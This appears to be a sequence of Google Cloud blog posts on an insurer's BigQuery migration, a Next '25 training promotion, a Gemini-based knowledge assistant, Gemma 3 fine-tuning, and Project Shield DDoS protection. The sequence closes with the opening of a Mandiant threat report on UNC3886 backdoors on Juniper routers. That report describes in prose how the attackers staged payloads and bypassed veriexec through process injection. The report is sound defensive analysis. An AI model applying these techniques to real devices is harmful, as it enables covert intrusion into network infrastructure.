Cloud

At Definity, a leading Canadian P&C insurer with a history spanning over 150 years, we have a long tradition of innovating to help our customers and communities adapt and thrive. To stay ahead in our rapidly evolving industry, we knew a unified data foundation was key to realizing the business and customer experience opportunities offered by modern analytics and AI. 

While our legacy on-premises Cloudera platform had served us well, it could no longer support our growing needs for scale, innovation, and harnessing the power of data and AI. So, we embarked on a critical mission: modernizing our data infrastructure.

Legacy limitations stifling innovation

We faced a combination of interconnected challenges, which impact many organizations today:

• Limited scalability and AI/ML workload support: Our existing infrastructure, constantly running at 80% utilization, was stretched thin. Processing billions of daily events for real-time analytics and scaling AI and ML workflows was a constant battle, limiting our ability to gain timely insights and develop innovative, data-driven products and experiences.

• Data silos, fragmented insights: Our data resided in various systems, creating a fragmented view of our business. This made it difficult to get a holistic understanding of our customers and hindered initiatives like building a comprehensive customer 360º view and delivering personalized recommendations at a moment of relevance.

• Escalating costs: Maintaining and scaling our Cloudera platform, which hosted massive data volumes (200TB compressed, 1PB uncompressed), was increasingly expensive and diverting valuable fiscal and people resources away from strategic priorities.

Faced with these pressing issues, the timing of our next renewal presented a strategic window of opportunity. We had a critical decision to make — migrate both technology and business platforms within 10 months or invest in upgrading our legacy Cloudera environment.

Building a unified data and AI platform with Google Cloud

We chose Google Cloud and its powerful duo, BigQuery and Vertex AI, to build the Strategic Data Platform (SDP) — our new modern data analytics platform. BigQuery’s serverless architecture, unmatched scalability, built-in ML capabilities, and seamless integration with Vertex AI made it the ideal solution to power our data-driven transformation.Our migration was a remarkably fast-paced effort, carried out in close collaboration with with Google Cloud and Quantiphi, a Google Cloud partner. 

Like many enterprises, we adopted a hybrid approach. We retained Databricks on Google Cloud for specific ETL workloads, utilizing Quantiphi’s expertise in converting legacy systems. At the same time, we migrated the bulk of our data processing to BigQuery for optimal cost-efficiency and performance. We also used Cloud Composer to orchestrate our complex data pipelines and ensure secure, private connectivity within our Google Cloud environment, a crucial requirement for handling sensitive customer data.

As a result, our dedicated team of over 100 Definity employees completed the migration in just ten months — 50% faster than the industry average. This rapid transition was aided by innovative tools, such as the “nifi-migration” solution built by Google Cloud Consulting. This open-source tool provided a visual and highly configurable way to automate real-time data flow between different systems, minimizing disruption and helping us surpass our initial migration timeline expectations.

Our CTO, Tatjana Lalkovic, who championed this effort to consolidate our structured and multimodal data to accelerate our AI/ML use cases, shared her perspective on the impact of our decision, saying:

“As we reimagined where data and AI could take our business, industry, and customer experience, Google Cloud BigQuery and Vertex AI stood out as modern, enterprise-ready serverless solutions prepared to meet the AI moment — not just today but for the foreseen future. The speed and success of this migration has created a lot of trust in our partnership and has been a significant boost to our digital transformation to streamline operations, improve products, and better serve customers.”

Strategic Data Platform – High level design on Google Cloud

Transforming insurance with data and AI

The results of our migration to BigQuery and Vertex AI has been transformative for Definity. We’ve seen exceptional user satisfaction, with the SDP achieving a remarkable Net Promoter Score (NPS) of 9.9 out of 10. The move has also saved us millions on our annual spend on non-strategic technologies and delivered a roughly 75% reduction in planned downtime for our digital platforms. 

Performance has also dramatically improved, with processes to gain insights that once took days now completing in an average of 4.5 hours. Moreover, migrating to Google Cloud has helped us increase agility and innovation. We’re now able to double our business releases per year — achieving a 30% increase in testing automation, a 63% improvement in deployment time, and a 10x faster infrastructure setup. 

By combining structured and unstructured data in BigQuery, we’ve unlocked new analytical possibilities and improved price-performance. This unified data foundation has empowered our business intelligence tools with richer, more comprehensive data, leading to more informed business decisions. The seamless integration with Vertex AI has enabled us to develop, deploy, and scale AI models, driving innovation in areas like fraud detection, automated intake, and personalized call center experiences. At the same time, we benefit from Google Cloud’s strong commitment to data security and privacy, helping us to strengthen our security posture and keep our customers safe.

As our VP of Data, Ron Mills, said:

“BigQuery’s serverless architecture has been a game-changer. The ‘nothing to manage’ approach is a huge differentiator. For enterprises like us that are migrating from on-prem clusters constantly running at 80% capacity, it’s like night and day.”

Lessons learned from our migration journey

Migrating a core data platform is a significant undertaking, and we’ve learned a lot along the way. For other organizations considering the same journey, here are some key takeaways from our experience:

• One team, one goal: Foster a collaborative environment where technology and business teams, vendors, contractors, and consultants work together seamlessly towards a shared objective.

• Leadership trust and commitment: Executive leadership trust in the delivery team’s decision-making is crucial for maintaining momentum and navigating challenges.

• Be bold: Don’t be afraid to think outside the box, make timely decisions, and be prepared to adapt quickly to unforeseen setbacks.

• Plan for the unknown: Anticipate potential roadblocks and have a core team dedicated to developing alternative solutions and addressing unforeseen issues.

• Strong business partnership: A trusted relationship with business teams is essential for smooth user acceptance testing, change management, and avoiding unnecessary disruptions during the migration.

• Balanced governance: Independent governance should provide guidance and support calculated risk-taking, acting as a partner in problem-solving rather than a blocker.

• Motivated team: Cultivate a team-oriented environment where ownership of the project extends beyond leadership to every team member.

• Transparent communication: Maintain open and consistent communication among all stakeholders (in our case, over 250 people) to ensure everyone is aligned and informed.

• Fast fail and incremental delivery: Avoid a “big bang” approach. Embrace incremental releases (we aimed for 2-5 daily releases) to learn quickly, adapt, and iterate.

• Parallel run: Plan for a parallel run of your systems on both the legacy and target cloud platforms to ensure a smooth transition and validate the new environment.

A data-driven future with limitless potential

Our migration to BigQuery and Vertex AI is just the first step in Definity’s data transformation journey. With a modern, scalable, and AI-ready data foundation now in place, we are empowered to unlock even greater value from our data and continue to lead innovation in the insurance industry. We are excited about the possibilities that lie ahead and are already actively developing our next AI use cases, including several focused on legal summarization and IT functions. We are confident that our partnership with Google Cloud will be instrumental in helping us achieve our goals.

Learn how to start your own migration journey to BigQuery today.

Get ready to dive deep and level up your cloud skills at Google Cloud Next ’25.  Whether you’re a seasoned pro or just starting your cloud journey, you’ll have more learning opportunities at Next than ever before. From hands-on challenges to expert-led workshops on AI and ML, Next ’25 (April 9-11, 2025) is your chance to transform your knowledge into real-world expertise. 

Secure your ticket and register today.

The first-ever Skills Challenge: your chance to win big

This year, we’re launching a new, on-the-ground game: The Skills Challenge. Think of it as your personal learning adventure at Google Cloud Next, complete with:

• Hands-on labs: Master practical skills. 

• Certification kickstarters: Pave your way to certification.

• AI Agent Builder Bar: Experience AI agent development.

• Quizzathon at Makerspace: Test your Google Cloud knowledge and win.

• Leaderboard competition: See how you stack up against your peers and compete for grand prizes.

• Early access: Be the first to try new gamification features on Google Cloud Skills Boost.

Don’t miss out on limited-edition swag and bragging rights on the leaderboard displayed at the Learning and Certification booth. Top the charts by the third day of Next for a chance to win a grand prize.

Dive into expert-led workshops

Developers, these lab-style sessions are for you. They’re led by knowledgeable experts who can help you build better, faster, and smarter applications. Secure your spot today by adding training sessions to your agenda, such as:

• Get started with Vertex AI Studio

• Explore data with Gemini in BigQuery

• Build a chat application using the Gemini API on Cloud Run

Register today, as seats are going fast.

Gain insights from breakout sessions and lightning talks

From in-depth technical learning to strategic insights for leaders, explore topics like credentialing a modern workforce, and building a culture of continuous learning with expert-led presentations and panel discussions. Hear from customers about their technical use cases and gain valuable takeaways about their specific approaches and solutions.

• Session Day 1: Future-proof your AI skills: Credentialing the modern workforce
• Session Day 2: The ROI of continuous learning: Build and validate skills to close the AI skills gap
• Lightning talk Day 1: Google Launchpad: Building a Global Talent Pipeline for Cloud and AI 
• Lightning talk Day1: Riding the AI Wave Securely: Uber’s Training Program for Building Trust 

Recharge at the Google Developer Experts and Certified Lounge

Connect with your peers, recharge, and refuel at an exclusive lounge reserved for Google Developer Experts. Enjoy light refreshments, meetups, and a photowall to capture your Next ’25 experience. When you register for Next, remember to identify yourself as Google Cloud Certified on your Profile page for easy lounge entry!

Can’t wait? Start learning today with Google Cloud Skills Boost

Don’t wait until Next to start your learning journey. Jump-start your skills with courses, labs, learning paths and more on Google Cloud Skills Boost. Join the Innovators program to get 35 credits at no cost and use them to keep learning on Skills Boost. 

We’ll see you April 9-11 at Google Cloud Next ‘25! Register today.

Today’s insurance customers expect more: simple digital services, instant access to service representatives when they want to discuss personal matters, and quick feedback on submitted invoices. Meeting these demands has become increasingly difficult for insurers due to rising inquiry volumes, a shortage of skilled workers, and the loss of expertise as employees retire. 

Recognizing the growing need for immediate and accurate responses, SIGNAL IDUNA, a leading German full-service insurer, particularly prominent in health insurance, introduced a cutting-edge AI knowledge assistant, powered by Google Cloud generative AI.

“We’ve pioneered to unlock the power of human-AI collaboration: To redefine process efficiency by bringing together technology and subject matter experts to deliver exceptional customer experiences,” said Johannes Rath, board member for Customer, Service, and Transformation at SIGNAL IDUNA.

SIGNAL IDUNA, in collaboration with Google Cloud, BCG and Deloitte, has developed an AI knowledge assistant that empowers service agents to quickly and accurately resolve complex customer inquiries. This innovative solution uses Google Cloud AI, including Google’s multimodal Gemini models, to help agents find relevant documents and provide comprehensive answers 30% faster — ultimately, enhancing customer satisfaction.

The Challenge: Meeting modern expectations

Like many organizations in the insurance sector, SIGNAL IDUNA faced significant operational burdens. The complexity of insurance products, along with the growing demand for immediate and accurate responses, often leads to bottlenecks that can impact service experiences.

For example, prior to introducing its AI knowledge assistant, service agents had to manually search thousands of internal documents for hundreds of different tariffs to find the information needed to answer questions or resolve customer issues — including, insurance conditions, tariff information, guidelines, and standard operating procedures. As a result, 27% of inquiries required further escalation to other departments or specialists, resulting in delayed resolutions, increased costs, and potential damage to reputation.

Though complex, SIGNAL IDUNA prioritized this process as one of its top gen AI use cases, developing an AI assistant to help agents provide quick and accurate answers to customer inquiries, particularly those about health insurance. The AI knowledge assistant is grounded in more than 2,000 internal documents for more than 600 different tariffs, allowing agents to ask questions in natural language and receive accurate answers, significantly reducing the time spent searching for relevant information.

A deep dive into SIGNAL IDUNA’s gen AI system

Working with Google Cloud, BCG, and Deloitte, SIGNAL IDUNA built a sophisticated generative AI architecture using Google Cloud’s AI platform, Vertex AI, and utilized Gemini 1.5 Pro’s long-context capabilities to develop an AI knowledge assistant that can provide quick and accurate access to the right information within a vast collection of documents. The system employs multiple steps to aggregate and process extensive information from diverse sources, ensuring agents can access the complete context necessary to effectively address customer inquiries.

Here’s a breakdown of the key steps:

1. Data pre-processing and extraction
The knowledge base is built from various document types, which are typically in PDF format, including policy documents, operating procedures, and general terms and conditions.

SIGNAL IDUNA utilizes a hybrid approach that combines Layout Parser in Google Cloud Document AI and PDFPlumber to parse these PDFs and extract the text content. While the Layout Parser is responsible for extracting the text segments, SIGNAL IDUNA enhances the extraction of tables with PDFPlumber if the quality of the PDFs allows. The extracted texts are then cleaned, chunked by Google’s Gecko multilingual embedding model, and enhanced with additional metadata, enabling the ability to process and analyze the information later effectively.

For storing the vectorized texts, Google Cloud SQL for PostgreSQL is used with the pgvector PostgreSQL extension, which provides a highly effective vector database solution for our needs. By storing vectorized text chunks in Cloud SQL, SIGNAL IDUNA benefits from its scalability, reliability, and seamless integration with other Google Cloud services, while pgvector empowers efficient similarity search functionality.

2. Query augmentation
Query augmentation generates multiple queries to improve the formulation of user questions for both document retrieval from the vector store and answer generation. The original question is reformulated into several variants, creating three versions in total: the original query, a rewritten query, and an imitation query. These are used then to retrieve relevant documents and generate the final answer.

For the rewritten query, the system uses Gemini Pro 1.5 to correct spelling errors in the original question. Additionally, the query is expanded by adding synonyms for predefined terms and tagging specific terms (e.g., “remedies,” “assistive devices,” “wahlleistung/selective benefits”) with categories. The system also uses information about selected tariffs to enrich the query. For example, tariff attributes, such as brand or contract type, are extracted from a database and appended to the query in a structured format. These specific adjustments make it possible to handle special tariff codes and add further context based on tariff prefixes.

The imitation query uses Gemini Pro 1.5 to rephrase the question to mimic the language of technical insurance documents, improving the semantic similarity with the source material. It considers conversation history and handles age formatting.

3. Retrieval
First, the system checks the query cache, which stores previously answered questions and their corresponding correct answers. If the question, or one very similar to it, has already been successfully resolved, the cached answer is retrieved, helping to provide a rapid answer. This efficient approach ensures quick access to information and avoids redundant processing. 

The accuracy of the cache is maintained through a user feedback loop, which identifies correctly answered questions to be stored in the cache through upvotes. A downvote on a cached answer triggers an immediate cache invalidation, ensuring only relevant and helpful responses are served. This dynamic approach improves the efficiency and accuracy of the system over time. If no matching questions are found in the query cache, the retrieval process falls back on the vector store, ensuring that the system can answer novel questions.

After retrieving any relevant information chunks from the query cache or vector store, the system uses the Vertex AI ranking API to rerank them. This crucial process analyzes various signals to refine the results, prioritizing relevance and ensuring the most accurate and helpful information is presented.

Ensuring complete and accurate answers is paramount during retrieval, and SIGNAL IDUNA found that some queries required information beyond what was available in the source documents. To address this issue, the system uses keyword-based augmentations to supplement the final prompt, providing a more comprehensive context for generating responses.

4. Generation
The answer generation process involves three key components: the user’s question with multiple queries, retrieved chunks of relevant information, and augmentations that add further context. These elements are combined to create the final response using a complex prompt template.

Delivering a near real-time experience is crucial for service agents, so SIGNAL IDUNA also streams the generated response. During development, minimizing latency based on the input posed a significant technical hurdle. To address this issue, SIGNAL IDUNA reduced processing times using asynchronous APIs to help stream data and handle multiple requests. Currently, the system has achieved an average response time of approximately 6 seconds, and SIGNAL IDUNA is experimenting with newer faster models to reduce this time even further.

5. Evaluation
Rigorous evaluation is essential for optimizing Retrieval Augmented Generation (RAG) systems. SIGNAL IDUNA uses the Gen AI evaluation service in Vertex AI to automate the assessment of both response quality and the performance of all process components, such as retrieval. A comprehensive question set, created with input from SIGNAL IDUNA’s service agents, forms the basis of these automated tests. 

The evaluation results flow seamlessly into Vertex AI Experiments and Google Cloud BigQuery. This enables SIGNAL IDUNA to visualize performance trends and gain actionable insights using dashboards with Looker on Google Cloud.

Here’s a closer look at how Looker helps evaluate the AI knowledge assistant:

• Chunk retrieval: First, SIGNAL IDUNA evaluates retrieval of relevant information chunks. Metrics at this stage help assess how effectively the model identifies and gathers the necessary information from the source data. This includes tracking gen AI metrics, such as recall, precision, and F1-score, to pinpoint areas for improvement in the retrieval process. This is crucial as retrieving the correct information is the foundation of a good generated response.

• Document reranking: Once the relevant chunks are retrieved, they’re reranked to prioritize the most pertinent information. The Looker dashboard allows monitoring the effectiveness of this reranking process.

• Generated vs. expected response comparison: The final stage involves comparing the generated response with the expected response. SIGNAL IDUNA evaluates the quality, accuracy, and completeness of the generated output, utilizing large language models (LLMs) to score the similarity between the generated response and the expected response.

• Explanation generation: To understand the reasoning behind an LLM’s evaluation, SIGNAL IDUNA generates explanations for its judgments. This provides valuable insights into the strengths and weaknesses of the generated responses, helping the developers identify specific areas for improvement.

This multi-stage evaluation approach provides SIGNAL IDUNA a holistic view of the model’s performance, enabling data-driven optimization at each stage. The Looker dashboard plays a vital role in visualizing these metrics, making it easier for the developers to identify areas where the model excels and where it needs improvement.

Real-world impact: AI-powered efficiency and productivity

To determine whether the AI assistant provided measurable added value for its workforce, SIGNAL IDUNA conducted an experiment with a total of 20 employees (internal and with external providers). During the experiment, customer requests were processed with and without the AI knowledge assistant to assess its impact. 

One of the key benefits observed was a reduction in processing time. Searching across numerous data sources used to be a time-consuming process. The experiment showed that using the AI knowledge assistant reduced the core processing time (information search and response formulation) by approximately 30% and increased the quality of the response based on expert evaluations. The time saved was particularly notable for employees with less than two years of experience in health insurance.

In addition, the AI knowledge assistant significantly increased the case closure rate. Health insurance is a very complex field, and the use of external service providers means that not every employee can always answer every customer question. With support from the AI knowledge assistant, SIGNAL IDUNA’s case closure rate increased by approximately 24 percentage points, rising from 73% to almost 98%.

Scaling for the Future

“Together with Google, we at SIGNAL IDUNA have successfully applied gen AI to one of our core business processes” Stefan Lemke, CIO at SIGNAL IDUNA, said. “Now, it’s time to scale this powerful technology across our entire organization. We’re not just scaling a tool, we’re scaling innovation, learning, and the possibilities of what we can achieve.”

Gen AI offers enormous potential for optimizing processes and developing innovative solutions. With its innovative approach — business teams experimenting with the technology in a decentralized manner and developing customized applications — SIGNAL IDUNA is primed to pioneer the next generation of insurance solutions and services. 

At the same time, SIGNAL IDUNA is establishing central standards to scale insights gained across the company and tap into the combined power of its teams, resources, and lines of business. This strategic decision has helped create valuable resources like code libraries, infrastructure blueprints, and centrally offered services. 

By combining agility with established standards and best practices, SIGNAL IDUNA can now react quickly to new requirements, setting a new standard for efficiency and customer satisfaction.

^{This project was delivered by the following core team members, Max Tschochohei, Anant Nawalgaria, and Corinna Ludwig by Google, and Christopher Masch, Michelle Mäding from SIGNAL IDUNA}

Today, we’re sharing the new Gemma 3 model is available on Vertex AI Model Garden, giving you immediate access for fine-tuning and deployment. You can quickly adapt Gemma 3 to your use case using Vertex AI’s pre-built containers and deployment tools. 

In this post, you’ll learn how to fine-tune Gemma 3 on Vertex AI and deploy it as a production-ready endpoint.

Gemma 3 on Vertex AI: PEFT and vLLM deployment

Tuning and deploying large language models can be computationally expensive and time-consuming. That’s why we’re excited to announce Gemma 3 support for Parameter-Efficient Fine-Tuning (PEFT) and optimized deployment using vLLM on Vertex AI Model Garden. 

Gemma 3 fine-tuning allows you to achieve performance gains with significantly less computational resources compared to full fine-tuning. Our vLLM-based deployment is easy-to-use and fast. vLLM’s optimized inference engine maximizes throughput and minimizes latency, ensuring a responsive and scalable endpoint for your Gemma 3 applications on Vertex AI.

Let’s look at how you can fine-tune and deploy your Gemma 3 model on Vertex AI.

Fine-tuning Gemma 3 on Vertex AI

In Vertex AI Model Garden, you can fine-tune and deploy Gemma 3 using PEFT (LoRA) from Hugging Face in only a few steps. Before you run the notebook make sure you complete all of the initial steps as described in the notebook. 

Fine-tuning Gemma 3 on Vertex AI for your use case requires a custom dataset. The recommended format is a JSONL file, where each line is a valid JSON string. Here’s an example inspired by the timdettmers/openassistant-guanaco dataset:

The JSON object has a key text, which should match train_column; The value should be one training data point, i.e. a string. You can upload your dataset to Google Cloud Storage (preferred) or to Hugging Face datasets.

Choose the Gemma 3 variant that best suits your needs. For example, to use the 1B parameter model:

You have the flexibility to customize model parameters and job arguments. Let’s explore some key settings. LoRA (Low-Rank Adaptation) is a PEFT technique that significantly reduces the number of trainable parameters. The following parameters control LoRA’s behavior. lora_rank controls to control dimensionality of the update matrices (smaller rank = fewer parameters), lora_alpha that scales the LoRA updates, and lora_dropout to add regularization. The following settings are a reasonable starting point.

When fine-tuning large language models (LLMs), precision is a key consideration, impacting both memory usage and performance. Lower precision training, such as 4-bit quantization, reduces the memory footprint. However, this can come with a slight performance trade-off compared to higher precisions like 8-bit or float16. The train_precision parameter dictates the numerical precision used during the training process. Choosing the right precision involves balancing resource limitations with desired model accuracy.

Optimizing model performance involves tuning training parameters that impact speed, stability, and capabilities. Essential parameters include per_device_train_batch_size, which determines the batch size per GPU, with larger sizes accelerating training but demanding more memory. gradient_accumulation_steps allows simulating larger batch sizes by accumulating gradients over smaller batches, providing a memory-efficient alternative at the cost of increased training time. The learning_rate dictates the optimization step size, where a rate that is too high can lead to divergence, while a rate that is too low can slow down convergence. The lr_scheduler_type dynamically adjusts the learning rate throughout training, such as through linear decay, fostering better convergence and accuracy. And, the total training duration is defined by either max_steps, specifying the total number of training steps, or num_train_epochs, with max_steps taking precedence if both are specified. Below you have the full training recipe you find in the official notebook.

Finally, create and run the CustomContainerTrainingJob to start the fine-tuning job.

You can monitor the fine-tuning progress using Tensorboard. Once the job is complete, you can upload the tuned model to the Vertex AI Model Registry and deploy it as an endpoint for inference. Let’s dive into deployment next. 

Deploying Gemma 3 on Vertex AI

Deploying Gemma 3 on Vertex AI requires only three steps as described in this notebook. 

First, you need to provision a dedicated endpoint for your Gemma 3 model. This provides a scalable and managed environment for hosting your model. You use the create function to set the endpoint name (display_name), and ensure dedicated resources for your model (dedicated_endpoint_enabled).

Next, register the Gemma 3 model within the Vertex AI Model Registry. Think of the Model Registry as a central hub for managing your models. It keeps track of different versions of your Gemma 3 model (in case you make improvements later), and is the central place from which you’ll deploy.

This step involves a few important configurations including the serving container to deploy Gemma 3. 

To serve Gemma 3 on Vertex AI, use the Vertex AI Model Garden vLLM pre-built Docker image for fast and efficient model serving. The vLLM recipe to set how vLLM will serve Gemma 3 which includes  --tensor-parallel-size lets you spread the model across multiple GPUs if you need extra computation resources, --gpu-memory-utilization controls how much of the GPU memory you want to use and --max-model-len sets the maximum length of text the model can process at once. You also have some advanced settings like --enable-chunked-prefill, and --enable-prefix-caching to optimize performance, especially when dealing with longer pieces of text. 

There are also some of deployment configuration Vertex AI requires to serve the model including the port (8080 in our case) that the serving container will listen on, defines the URL path for making prediction requests (e.g., “/generate”) and the URL path for health checks (e.g., “/ping”), allowing Vertex AI to monitor the model’s status.

Finally, use upload() to take this configuration – the serving container, your model-specific settings, and instructions for how to run the model – and bundle them up into a single, manageable unit within the Vertex AI Model Registry. This makes deployment and version control much easier.

Now you’re ready to deploy the model. To deploy the registered model to the endpoint, use the deploy method as shown below.

This is where you choose the computing power for our deployment including the type of virtual machine (like “a3-highgpu-2g”, machine_type), the kind of accelerator (e.g., “NVIDIA_L4” GPUs, accelerator_type), how many accelerators to use (accelerator_count). 

Deploying the model requires some time and you can monitor the status of the deployment in Cloud Logging. Once you get the endpoint running, you can use the ChatCompletion API to call the model and integrate it within your applications as shown below.

Depending on the Gemma model you deploy, you can use the ChatCompletion API to call the model with multimodal inputs (images). You can find more in the “Deploy Gemma 3 4B, 12B and 27B multimodal models with vLLM on GPU” section of the model card notebook.

What’s next?

Visit the Gemma 3 model card on Vertex AI Model Garden to get started today. For a deeper understanding of the model’s architecture and performance, check out this developer guide on Gemma 3.

As part of Google’s commitment to making the world’s information universally accessible, we offer Project Shield to at-risk organizations who need free distributed denial-of-service (DDoS) protection. Organizations in eligible categories, including news publishers, government elections, and human rights defenders, can use the power of Google Cloud’s networking services to help keep their websites available and online for free. 

Over the past several months, the Project Shield team has made a series of improvements to make it even easier to protect your site by improving the most common workflows: applying to Project Shield, setting up protection, and automating defenses.

Applying to Shield

Built on the strength of Google Cloud networking services, including load balancing, Cloud CDN, and Cloud Armor, Project Shield’s services can be configured through an interface on the Project Shield dashboard as a managed experience.

Prospective users can submit a brief application with just a few pieces of information about their website and organization. With a recent update, our application flow now checks your application in real-time, ensuring that typos don’t delay or block your application. We’ve also made it easier than ever to select your country of origin and other similar information with searchable dropdown menus. Most importantly, we have restructured our application flow to be easier than ever to navigate on a mobile device. 

Setting up protection

Once approved, users can set up their website on the Project Shield dashboard by configuring key information. This activates the networking services that will protect the site, and takes only a few minutes.

Today we’re also announcing that we’ve enhanced this workflow to automatically gather all of the required information using the domain provided during the application. Users are given a chance to double-check this information and make any necessary modifications. 

Additionally, we now offer all users a Shield-managed certificate by default to protect their HTTPS traffic, streamlining setup by removing the burden of providing their own certificate. Advanced users can replace this Shield-managed certificate with their own certificate if desired.

Once the information is verified, Project Shield sets up the requisite Google Cloud services behind the scenes in just a few minutes. During this process, we now show a detailed progress bar, keeping the user informed about the state of this setup procedure. When everything is ready, the user can enable Project Shield’s protection by changing their DNS to point their network traffic to our new load balancer.

To further protect your website against a gap in service, Project Shield now performs end-to-end checks to ensure your website will function properly on our load balancer before instructing you to point your traffic to our service. If some of your configuration information was incorrect, or if there are any unusual errors with your setup, your dashboard will now automatically inform you of the issue, and help you resolve the error.

Automated defenses

Project Shield defends your website from DDoS attacks using the power of Google Cloud Armor. These protections are fully managed by Project Shield, and include rate limiting and banning clients participating in attacks. These defenses are custom-tailored to your site, using several different types of traffic measurement to ensure legitimate clients always have access, while blocking bad actors as quickly as possible. These defenses will mitigate most attacks with zero configuration from the user.

We’re announcing that Project Shield now employs additional types of rate limiting, specifically around cache-busting techniques. This frequent attack type is now handled more effectively, providing coverage for resources and HTTP methods that can not be served from Project Shield’s cache.

Project Shield also employs Cloud Armor Enterprise Adaptive Protection, using the latest machine-learning techniques to identify attack patterns and block them real-time. We are now able to expedite enabling this protection for websites onboarding onto Project Shield. All new Project Shield configurations now receive this protection less than 24 hours after onboarding.

Even more new protections

To supplement our automated protection, Project Shield offers a number of user-configurable defenses, including IP allow lists and deny lists, and reCAPTCHA, powered by Google Cloud Armor and reCAPTCHA Enterprise. These allow users to respond to an attack and take immediate action, including API integration for automatic response. 

Project Shield now offers path allow and deny lists that will allow users to completely block certain paths commonly used by attackers, limit certain paths to admin-only access, or force certain paths to bypass our defenses entirely. This gives users more control over how the resources on their websites are served and protected. 

To mitigate the threat of an attacker targeting your hosting server directly, Project Shield now offers a signature on all requests from Project Shield so you can block all other malicious traffic. This signature comes in the form of a network header that you can customize with your own secret value, or one auto-generated specifically for your site by Project Shield.

One of the strongest defenses Project Shield offers is Google’s edge network cache. This speeds up the performance of your site, ensures that your resources are always available to legitimate customers, and protects your hosting server from attacks on these cacheable resources. This system can be optimized by correctly setting cache control headers on your content, which allows Project Shield to store and serve each piece of content.

Project Shield now offers a dashboard showing automated analysis of your site and suggestions for resources that would benefit from caching. This will allow you to get more performance out of Project Shield’s cache and stronger defense for your site. 

Giving you control over data

While Project Shield is protecting your site, much of your traffic may be served from our cache or rate-limited if part of an attack. We know that access to your traffic data is important, and Project Shield offers dashboard graphs to give you the complete picture of your site’s performance. We now also offer an API so you can download and save your data.

We also rolled out a new graph, to show you where traffic to your site is coming from. This new dashboard graph breaks your traffic down by region, and offers you the selection between percentage breakdown and raw queries-per-second.

You should always be in control of your data, and Project Shield now offers the capability for you to easily download the contents of your user account so that you can inspect the limited data Project Shield stores for you. We also offer the capability to easily delete all of your data in Project Shield without affecting other aspects of your Google account. 

Welcoming more users

Project Shield is a global service, designed to protect websites in many categories all around the world. We’ve recently expanded our commitment to this mission by opening Project Shield to new eligibility categories including rights for marginalized groups, and non-profit arts and sciences. 

Additionally, we have expanded localization for the Project Shield public site and dashboard, now offering more than 40 languages to help serve our global audience.

With all of these recent improvements, it is easier than ever to protect your site with Project Shield. Head over to projectshield.google and sign up your organization today.

Written by: Lukasz Lamparski, Punsaen Boonyakarn, Shawn Chew, Frank Tse, Jakub Jozwiak, Mathew Potaczek, Logeswaran Nadarajan, Nick Harbour, Mustafa Nasser

Introduction

In mid 2024, Mandiant discovered threat actors deployed custom backdoors on Juniper Networks’ Junos OS routers. Mandiant attributed these backdoors to the China-nexus espionage group, UNC3886. Mandiant uncovered several TINYSHELL based backdoors operating on Juniper Networks’ Junos OS routers. The backdoors had varying custom capabilities, including active and passive backdoor functions, as well as an embedded script that disables logging mechanisms on the target device.

Mandiant worked with Juniper Networks to investigate this activity and observed that the affected Juniper MX routers were running end-of-life hardware and software. Mandiant recommends that organizations upgrade their Juniper devices to the latest images released by Juniper Networks, which includes mitigations and updated signatures for the Juniper Malware Removal Tool (JMRT). Organizations should run the JMRT Quick Scan and Integrity Check after the upgrade.

Mandiant has reported on similar custom malware ecosystems in 2022 and 2023 that UNC3886 deployed on virtualization technologies and network edge devices. This blog post showcases a development in UNC3886’s tactics, techniques and procedures (TTPs), and their focus on malware and capabilities that enable them to operate on network and edge devices, which typically lack security monitoring and detection solutions, such as endpoint detection and response (EDR) agents. 

Mandiant previously reported on UNC3886’s emphasis on techniques to gather and use legitimate credentials to move laterally within a network, undetected. These objectives remained consistent but were pursued with the introduction of a new tool in 2024. Observations in this blog post strengthen our assessment that the actor’s focus is on maintaining long-term access to victim networks. UNC3886 continues to show a deep understanding of the underlying technology of the appliances being targeted.

At the time of writing, Mandiant has not identified any technical overlaps between activities detailed in this blog post and those publicly reported by other parties as Volt Typhoon or Salt Typhoon. 

Attribution

UNC3886 is a highly adept China-nexus cyber espionage group that has historically targeted network devices and virtualization technologies with zero-day exploits. UNC3886 interests seem to be focused mainly on defense, technology, and telecommunication organizations located in the US and Asia. The activity described in this blog post is the latest in a number of operations where UNC3886 has leveraged custom malware to target network devices. The malware deployed on Juniper Networks’ Junos OS routers demonstrates that UNC3886 has in-depth knowledge of advanced system internals. Furthermore, UNC3886 continues to prioritize stealth in its operations through the use of passive backdoors, together with log and forensics artifact tampering, indicating a focus on long-term persistence, while minimizing the risk of detection.

Junos OS

Juniper Networks Junos OS is a proprietary operating system that powers most Juniper routing, switching, and security devices. It is based on a modified FreeBSD operating system. Junos OS supports 2 different modes of operations:

• CLI mode: where standard Junos OS CLI commands can be issued

• Shell mode: a user with shell access privileges can access an underlying FreeBSD shell and issue standard FreeBSD commands.

Malware identified in this blog post primarily relies on access to the csh shell, but in some cases it is also aware of higher layers.

Veriexec

Junos OS incorporates a Verified Exec (veriexec) subsystem, which is a modified version of an original NetBSD Veriexec Subsystem. Veriexec is a kernel-based file integrity subsystem that protects the Junos OS operating system (OS) against unauthorized code including binaries, libraries, and scripts and activity that might compromise the integrity of the device. To run malware, the threat actor first needed to bypass veriexec protection.

Mandiant did not observe evidence indicating successful exploitation of veriexec bypass techniques already addressed by Juniper in supported software and hardware. However, aside from the process injection technique described later in this blog post, infection on the compromised EOL Juniper MX routers indicate that the threat actor successfully deployed executable backdoors. Mandiant identified the threat actor had root access to the impacted devices.

Circumventing Veriexec with Process Injection

Veriexec protection prevents unauthorized binaries from executing. This poses a challenge for threat actors, as disabling veriexec can trigger alerts. However, execution of untrusted code is still possible if it occurs within the context of a trusted process. Mandiant’s investigation revealed that UNC3886 was able to circumvent this protection by injecting malicious code into the memory of a legitimate process.

To achieve this, UNC3886 first gained privileged access to a Juniper router from a terminal server used for managing network devices using legitimate credentials, and entered the FreeBSD shell from the Junos OS CLI. Within the shell environment, they used the “here document” feature to generate a base64 encoded file named ldb.b64. This encoded file was then decoded using base64 to create a compressed archive named ldb.tar.gz, which was subsequently decompressed and extracted using the gunzip and tar utilities to extract malicious binaries.

Mandiant was unable to recover the full content of ldb.b64 or ldb.tar.gz on the compromised Juniper routers’ file system. However, Mandiant successfully recovered three malicious payloads by performing analysis on the memory of a compromised router. The purpose of the payloads was as follows:

• loader.bin is a shellcode loader responsible for loading functions including exit, mmap, open, read, and close from a standard library libc.so.7, allocating memory, and loading and executing the final payload from payload.bin

• pc.bin contains a memory address 0x4012f0

• payload.bin was identified to be the Position Independent Code (PIC) version of the lmpad backdoor

Details of lmpad backdoor are covered in the Malware Analysis section.

